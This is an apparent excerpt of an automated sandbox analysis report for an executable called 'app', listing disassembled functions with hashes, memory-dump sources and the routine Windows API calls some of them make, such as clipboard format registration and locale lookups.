                                                                                                                                              • Instruction ID: 5f878920901a51bff63f9c7ce6f56e1e90bafd3fa833b8bdd1da0bb451fea022
                                                                                                                                              • Opcode Fuzzy Hash: 998677bf26be223f5bce6a2b86f89a1f9df7ccf45b26c7b66d4fc4a99f3cffc7
                                                                                                                                              • Instruction Fuzzy Hash: 39912C72A087019FD318CF6AC88035BF7E2AFC8710F1AC93EA599D7754DA74A8519B81
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025AC6AE Relevance: .2, Instructions: 150COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 393c3d374bd8c63c777b2d7d9f932cb451af37f2bf3dfa0de7fa71c2bc9b16f8
                                                                                                                                              • Instruction ID: 95471746c90605396dad2cf56e1d5d2bcd93722991a68cd17ccbef0c61f3614b
                                                                                                                                              • Opcode Fuzzy Hash: 393c3d374bd8c63c777b2d7d9f932cb451af37f2bf3dfa0de7fa71c2bc9b16f8
                                                                                                                                              • Instruction Fuzzy Hash: 25418072A083104FC7149EAD889062AFBE5BBC8714F05892EF9D9C3341D774DC058B96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025A628E Relevance: .1, Instructions: 138COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                              • Opcode ID: 6e51c7faef0564102dc195f7525f9acbf82fac21e2be0411007f797b0e177185
                                                                                                                                              • Instruction ID: cbc79b06d30ae3dd921b1747c8e2c0c934cb6769d3ffcb5f6e52da2c15ba8a7b
                                                                                                                                              • Opcode Fuzzy Hash: 6e51c7faef0564102dc195f7525f9acbf82fac21e2be0411007f797b0e177185
                                                                                                                                              • Instruction Fuzzy Hash: 0B413771F006811BD7089E78D852366B7D6FBD8304F14963DE689C7780F7B4D8918B54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025DD3C0 Relevance: .1, Instructions: 133COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 30bc2c7a4d68d0212d6293902854fcbefbd6b1e392bebafcbc4498d0f6901e01
                                                                                                                                              • Instruction ID: 16b1ffe6904467bb76c4f94a5d9be491e8c56437dfc3a7d5ed9a65479a5f3b46
                                                                                                                                              • Opcode Fuzzy Hash: 30bc2c7a4d68d0212d6293902854fcbefbd6b1e392bebafcbc4498d0f6901e01
                                                                                                                                              • Instruction Fuzzy Hash: B9415A76A187159FD708DE29C89025FFBE2AFC8350F15CA2DE999D7351DA30D805CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00407DBE Relevance: .1, Instructions: 100COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fa6128884ea52e64c76ff3e3364ef09faa5366da33f3e04718ef87ad060ba4cb
                                                                                                                                              • Instruction ID: bea78ab49d568d8cc68ab5b9c56c3e372d34a610e398940364b997e8bf37097f
                                                                                                                                              • Opcode Fuzzy Hash: fa6128884ea52e64c76ff3e3364ef09faa5366da33f3e04718ef87ad060ba4cb
                                                                                                                                              • Instruction Fuzzy Hash: E331B873F5A3859EC305CA6884401D97F619B7A208B6CC6EED4445F383C2B79A07C766
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00407703 Relevance: .1, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f8f59f7a406eb4b85d93dfd7fae9637fb6621cf33be82f32cec578064e2cccf9
                                                                                                                                              • Instruction ID: 5f762f80975287f2da4cc5c3f4db9215d90f79417d5e070c4ca66a264b4d2add
                                                                                                                                              • Opcode Fuzzy Hash: f8f59f7a406eb4b85d93dfd7fae9637fb6621cf33be82f32cec578064e2cccf9
                                                                                                                                              • Instruction Fuzzy Hash: 14313C35624B545FD750EE7688C0D3B77E9BB88B243400C2EE943D3691DABAF8014A65
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004077F6 Relevance: .1, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ae75250db23d3f65a106ccb7db6d0b7db7673aad107e272ec9e65786d8c8dc3a
                                                                                                                                              • Instruction ID: a28aa33132646e52dc6174b08334311de5fd8f37993466fb3b074f5a633b62d4
                                                                                                                                              • Opcode Fuzzy Hash: ae75250db23d3f65a106ccb7db6d0b7db7673aad107e272ec9e65786d8c8dc3a
                                                                                                                                              • Instruction Fuzzy Hash: 74313C35624B545FD750EE7688C0D3B77E9BB88B243400C2EE943D3691DABAF8014A55
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00409127 Relevance: .1, Instructions: 79COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 80dc16c4b31a12e895f4eb3d02c2bf18cd06df24083ebb6c5dcc11986d386e4b
                                                                                                                                              • Instruction ID: 9fae89fed201fb87603fd6b142b5de75446cc31e3fa449c8e06de045bb1d32cf
                                                                                                                                              • Opcode Fuzzy Hash: 80dc16c4b31a12e895f4eb3d02c2bf18cd06df24083ebb6c5dcc11986d386e4b
                                                                                                                                              • Instruction Fuzzy Hash: D4214AB1D04609AEEB24CF5AD8405AEFBF4FF84360F20462FE455B7291D7395A02CB68
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00409A38 Relevance: .1, Instructions: 79COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 471361ffd1135b2c1fce0387e3c50f122f3eba086dcd4d0d050b43a0f3504bdb
                                                                                                                                              • Instruction ID: 2a7c390b1601eb7402f742876ed82ff69b70e3e7b876b19d7b158a76fac5e0c4
                                                                                                                                              • Opcode Fuzzy Hash: 471361ffd1135b2c1fce0387e3c50f122f3eba086dcd4d0d050b43a0f3504bdb
                                                                                                                                              • Instruction Fuzzy Hash: 09212D72B146489FC740CF69C48079ABBF1AF8A358B6985AAC454AF383D276D907CF50
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040941D Relevance: .1, Instructions: 71COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 329905633bc8b0a94ac0c240274939d2d8898a23d6a58f63f4b797b9910009b9
                                                                                                                                              • Instruction ID: 47aef34c857a658a6300e4a75fbe3735692d0a3d265a10cf1240a7a73e3e61bd
                                                                                                                                              • Opcode Fuzzy Hash: 329905633bc8b0a94ac0c240274939d2d8898a23d6a58f63f4b797b9910009b9
                                                                                                                                              • Instruction Fuzzy Hash: 6B1151156092C82FDF094A6C84B62EE7FA18FA7250F48D1DDADD997383C06C860ED764
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004092DE Relevance: .1, Instructions: 61COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 028772365812209ae3b034f4d7fb155149baea42fefa9e56ea01cf4f30ab10be
                                                                                                                                              • Instruction ID: 9134e66de6b4e5ea04456834c8a1a991d62c2b8f5af9fc7be7d8a5352cf769b0
                                                                                                                                              • Opcode Fuzzy Hash: 028772365812209ae3b034f4d7fb155149baea42fefa9e56ea01cf4f30ab10be
                                                                                                                                              • Instruction Fuzzy Hash: F41196162451886FDF0D496D84F73DE2FA1CBA7240F48919A989987783C02D811FE764
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00408FF2 Relevance: .0, Instructions: 35COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 69f6bb77fbef33ec5531855511c1a3eb96a541a6779409ec123430190a6b4409
                                                                                                                                              • Instruction ID: 45a5f8739c1aa389b1f2b86d6161cac0944a6aa1e8b0d199d8837934870e1e0a
                                                                                                                                              • Opcode Fuzzy Hash: 69f6bb77fbef33ec5531855511c1a3eb96a541a6779409ec123430190a6b4409
                                                                                                                                              • Instruction Fuzzy Hash: 41F06272E102289BCF14DFA9CD416CDFBF1AF88724F25821AE514B3291CA7959049B68
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042C019 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegisterClipboardFormatA.USER32(Native), ref: 0042C028
                                                                                                                                              • RegisterClipboardFormatA.USER32(OwnerLink), ref: 0042C031
                                                                                                                                              • RegisterClipboardFormatA.USER32(ObjectLink), ref: 0042C03B
                                                                                                                                              • RegisterClipboardFormatA.USER32(Embedded Object), ref: 0042C045
                                                                                                                                              • RegisterClipboardFormatA.USER32(Embed Source), ref: 0042C04F
                                                                                                                                              • RegisterClipboardFormatA.USER32(Link Source), ref: 0042C059
                                                                                                                                              • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 0042C063
                                                                                                                                              • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 0042C06D
                                                                                                                                              • RegisterClipboardFormatA.USER32(FileName), ref: 0042C077
                                                                                                                                              • RegisterClipboardFormatA.USER32(FileNameW), ref: 0042C081
                                                                                                                                              • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 0042C08B
                                                                                                                                              • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 0042C095
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClipboardFormatRegister
                                                                                                                                              • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                                              • API String ID: 1228543026-2889995556
                                                                                                                                              • Opcode ID: 6b5a084f798606625df073df63a90125f29f45b26c0b684456c2d3012832e5f7
                                                                                                                                              • Instruction ID: 353324ec1318cbb582c5df8b14f60fd4019d8d1e18631fe9f1ac3c0909de5a58
                                                                                                                                              • Opcode Fuzzy Hash: 6b5a084f798606625df073df63a90125f29f45b26c0b684456c2d3012832e5f7
                                                                                                                                              • Instruction Fuzzy Hash: 7B013571A407446A8B30BF769C0AD4BBAE4EEC9B107625D2FE09597650DAF89841CF88
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00429F0B Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 169registrylibraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00429F31
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00429F3C
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 00429F6D
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 00429F75
                                                                                                                                              • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 00429F82
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 00429F9C
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(000003FF), ref: 00429FA2
                                                                                                                                              • GetVersion.KERNEL32 ref: 00429FB0
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00429FD5
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00429FFB
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0042A047
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(76170A60), ref: 0042A04D
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042A058
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                                                                                              • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                                              • API String ID: 780041395-483790700
                                                                                                                                              • Opcode ID: 203f824ac1d43bbac6753af98df5ecf5df3a10049759535824241b98e85e0784
                                                                                                                                              • Instruction ID: b78f76d465d7b8429b50d250dff1f3f1b8a90edccc9fbb2a61dff07a2d830dcb
                                                                                                                                              • Opcode Fuzzy Hash: 203f824ac1d43bbac6753af98df5ecf5df3a10049759535824241b98e85e0784
                                                                                                                                              • Instruction Fuzzy Hash: 155195B1F00228AFDB20DFE5DC85AAFBBB8FB08314F90447BE901E3140D67899449B55
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00403B02 Relevance: 37.1, APIs: 16, Strings: 5, Instructions: 357fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000104,?), ref: 00403B29
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • CharLowerA.USER32(?,?,00000004,?), ref: 00403B60
                                                                                                                                              • DeleteFileA.KERNEL32(00446BF0), ref: 00403F98
                                                                                                                                                • Part of subcall function 00402C6D: MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                                • Part of subcall function 0040A0A4: GetVersionExA.KERNEL32(?), ref: 0040A0E9
                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00403C90
                                                                                                                                              • CoUninitialize.OLE32 ref: 00403CAD
                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00403D01
